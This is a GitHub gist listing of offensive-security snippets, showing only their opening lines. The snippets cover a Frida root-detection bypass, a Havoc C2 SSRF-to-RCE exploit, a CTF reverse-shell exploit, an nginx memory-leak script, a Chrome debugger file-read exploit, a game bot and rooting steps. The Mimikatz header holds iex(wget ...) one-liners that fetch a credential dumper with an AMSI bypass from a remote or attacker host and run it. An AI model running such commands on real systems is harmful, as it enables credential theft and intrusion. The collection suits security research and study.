Skip to content

Instantly share code, notes, and snippets.

View pich4ya's full-sized avatar

LongCat pich4ya

116 followers · 1 following
View GitHub Profile
@pich4ya
pich4ya / proxychains-ng_m1.txt
Created March 6, 2023 03:25
Install proxychains-ng on macOS m1/m2 arm64e natively without Rosetta 2 (2023)
# @author Pichaya Morimoto (p.morimoto@sth.sh)
Problem:
```bash
brew install proxychains-ng
proxychains4 ncat 1.2.3.4 # not working
```
There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / Invoke-OneShot-Mimikatz.ps1
Last active February 3, 2025 16:46
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
@pich4ya
pich4ya / havoc_ssrf2rce.py
Last active January 21, 2025 15:49
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
# Havoc C2 SSRF to AuthN RCE
# @author longcat (https://sth.sh)
#
# sudo ncat -lvp 443
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L
#
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE)
# Their writeups are great. I am so fascinating to read @_chebuya blog post :)
# My work is just to integrate them into one single shot exploit.
# In short, make WebSocket works with Havoc C2 Agent Payload
@pich4ya
pich4ya / apk_getString_R_string.py
Last active January 19, 2025 15:28
This script can be used to replace strings.xml values in a target Java file
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# I tried all jadx options for debof, but it did not work.
# This script can be used to replace strings.xml values in a target Java file
# if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) {
# Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources
import xml.etree.ElementTree as ET
import re
import sys
@pich4ya
pich4ya / bookclub_exploit_rce.py
Last active December 29, 2024 07:42
Exploit for SEC Playground Bloody Xmas 2024 - Bookclub
#!/usr/bin/env python
# @author: longcat
# SEC Playground Bloody Xmas 2024 - Bookclub
# Exploit #2 - Read Flag w/ RCE (Reverse Shell)
import requests
import sys
import time
import argparse
import urllib3
@pich4ya
pich4ya / nginx_leak.py
Created May 9, 2018 08:51
Nginx - Remote Integer Overflow Vulnerability (Memory Leak, CVE-2017-7529)
#!/usr/bin/python
# -*- coding:utf-8 -*-
# https://github.com/nixawk/labs/issues/15
# Nginx - Remote Integer Overflow Vulnerability (Memory Leak)
# CVE-2017-7529
import requests
import logging
import sys
@pich4ya
pich4ya / alienworlds_bot.js
Created April 12, 2021 06:13
// บอทปั้มเงิน TLM เกม Alien Worlds (เงินจะเอาไปแลกเงินจริงใน Binance ได้)
// ไว้ทดสอบเฉย ๆ อย่าเอาไปใช้จริง คนเขียนไม่รับผิดชอบต่อบั๊กใด ๆ ทั้งสิ้น
//
// วิธีใช้:
// 1. สมัคร + เข้า https://play.alienworlds.io/
// 2. ต้องเคย mine แบบ manual ก่อน 1 ครั้ง
// 3. ก๊อปสคริปท์นี้ไปแปะใน Console (F12)
// น่าจะมีบั๊กพวก rate limit อะไรทั้งหลาย กับ if/loop บางอันเอาออกได้
// ลองรันเล่น ๆ 5 ชม จาก user เปล่า ๆ ได้มา 8 TLM (ขึ้นกับดวงและอื่นๆด้วยมั่ง)
// ใครว่าง ๆ แก้เป็นยิงเข้า API โดยตรงไม่ผ่าน JS น่าจะเสถียรกว่าเยอะมาก
@pich4ya
pich4ya / chrome_remote_debug_lfi.py
Created March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine with
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase
import requests
import json
import urllib3
import websocket
@pich4ya
pich4ya / magisk.txt
Last active October 11, 2024 00:49
Unlock bootloader / install TWRP / *root* with Magisk / install Magisk Manager on Google Pixel 1 using MacOS
@author LongCat (Pichaya Morimoto)
-- Unlock bootloader
Note: this will unlock bootloader & perform factory reset.
1. Prepare the device
Remove all screen unlock methods.
Enable Developer Mode: Settings > About phone > tap seven times on "Build number"
Enable USB Debgging: Settings > Developer options > Select "USB debugging"
Enable OEM Unlock: Settings > Developer options > Select "OEM unlocking"